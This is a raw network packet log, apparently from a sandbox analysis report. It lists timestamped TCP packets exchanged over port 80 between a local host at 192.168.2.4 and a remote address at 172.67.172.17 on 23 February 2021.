Feb 23, 2021 15:30:33.624938011 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.624948025 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.624964952 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.624984980 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.624988079 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.625001907 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.625011921 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.625019073 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.625035048 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.625040054 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.625078917 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.625332117 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.625351906 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.625427008 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.625442982 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.625446081 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.625459909 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.625472069 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.625489950 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.625505924 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.625520945 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.625520945 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.625555992 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.625561953 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.625579119 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.625595093 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.625603914 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.625614882 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.625632048 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.625638962 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.625648022 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.625664949 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.625670910 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.625713110 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.657835007 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.657875061 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.657898903 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.657927990 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.657933950 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.657953024 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.657974005 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.657977104 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.658003092 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.658023119 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.658029079 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.658054113 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.658066988 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.658081055 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.658104897 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.658118963 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.658129930 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.658153057 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.658170938 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.658176899 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.658200979 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.658217907 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.658222914 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.658247948 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.658267975 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.660352945 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660383940 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660408020 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660433054 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660439968 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.660455942 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660480976 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660500050 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660510063 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.660523891 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660541058 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660552979 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.660557032 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660573959 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660589933 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660603046 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.660609007 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660636902 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.660636902 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660656929 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660670042 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.660679102 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660695076 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660706997 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660720110 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660722971 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.660732031 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660743952 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660761118 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660779953 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660788059 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.660798073 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660814047 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660821915 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.660830975 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660846949 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660857916 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.660864115 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660880089 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660892963 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.660900116 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660919905 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660922050 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.660937071 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660979033 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.660995960 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661011934 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661015034 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.661027908 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661039114 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.661043882 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661060095 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661067009 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.661078930 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661097050 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661112070 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.661113024 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661129951 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661145926 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661160946 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661166906 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.661176920 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661191940 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661207914 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.661221027 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661228895 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.661237955 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661274910 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661287069 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.661295891 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661309958 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661328077 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661334991 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.661345005 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661369085 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661380053 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.661402941 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661406994 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.661422014 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661437988 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.661473036 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.661510944 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.662054062 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.662070990 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.662084103 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.662110090 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.662122965 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.662156105 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.662189960 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.662198067 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.662210941 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.662230015 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.662245035 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.662254095 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.662261963 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.662281036 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.662291050 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.662307024 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.662326097 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.662329912 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.662344933 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.662360907 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.662369967 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.662405014 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.662966967 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.662983894 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.663013935 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.663028955 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.663029909 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.663045883 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.663065910 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.663067102 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.663084984 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.663100004 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.663110018 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.663116932 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.663130999 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.663151026 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.663160086 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.663167953 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.663184881 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.663202047 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.663202047 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.663218975 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.663227081 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.663235903 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.663248062 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.663281918 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.663952112 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.663969994 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.663985968 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.664001942 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.664015055 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.664017916 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.664035082 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.664038897 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.664055109 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.664071083 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.664072990 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.664088964 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.664105892 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.664119959 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.664124012 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.664139986 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.664145947 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.664155960 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.664170980 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.664184093 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.664191008 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.664207935 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.664208889 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.664262056 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.664901972 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.664920092 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.664937973 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.664954901 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.664973021 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.664983988 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.664989948 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.665007114 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.665014982 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.665038109 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.665047884 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.665059090 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.665077925 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.665085077 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.665093899 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.665112019 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.665126085 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.665128946 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.665146112 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.665153980 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.665163040 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.665180922 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.665191889 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.665219069 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.665846109 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.665870905 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.665889025 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.665906906 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.665924072 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.665930986 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.665941000 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.665957928 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.665963888 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.665977955 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.665987015 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.665997028 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.666013956 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.666028023 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.666030884 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.666047096 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.666068077 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.666078091 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.666094065 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.666110039 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.666127920 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.666135073 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.666168928 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.666832924 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.666851044 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.666867971 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.666882992 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.666898966 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.666908979 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.666914940 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.666934013 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.666934967 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.666951895 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.666953087 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.666976929 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.666996956 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.666997910 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.667015076 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.667032003 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.667033911 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.667052031 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.667068958 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.667073011 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.667084932 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.667102098 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.667108059 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.667144060 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.667853117 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.667886019 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.667908907 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.667936087 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.667942047 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.667960882 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.667984962 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.667987108 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.668009996 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.668035030 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.668039083 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.668057919 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.668081999 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.668088913 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.668104887 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.668123960 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.668133020 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.668158054 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.668173075 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.668181896 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.668205023 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.668220997 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.668229103 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.668320894 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.668704987 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.668734074 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.668761015 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.668786049 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.668787956 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.668811083 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.668832064 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.668836117 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.668862104 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.668885946 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.668921947 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.668931961 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.668956041 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.668986082 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.668996096 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.669012070 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.669019938 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.669035912 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.669059038 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.669075012 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.669081926 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.669096947 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.669105053 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.669142962 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.669673920 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.669703960 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.669728041 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.669739962 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.669751883 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.669776917 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.669790030 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.669802904 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.669830084 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.669837952 CET	49737	80	192.168.2.4	172.67.172.17
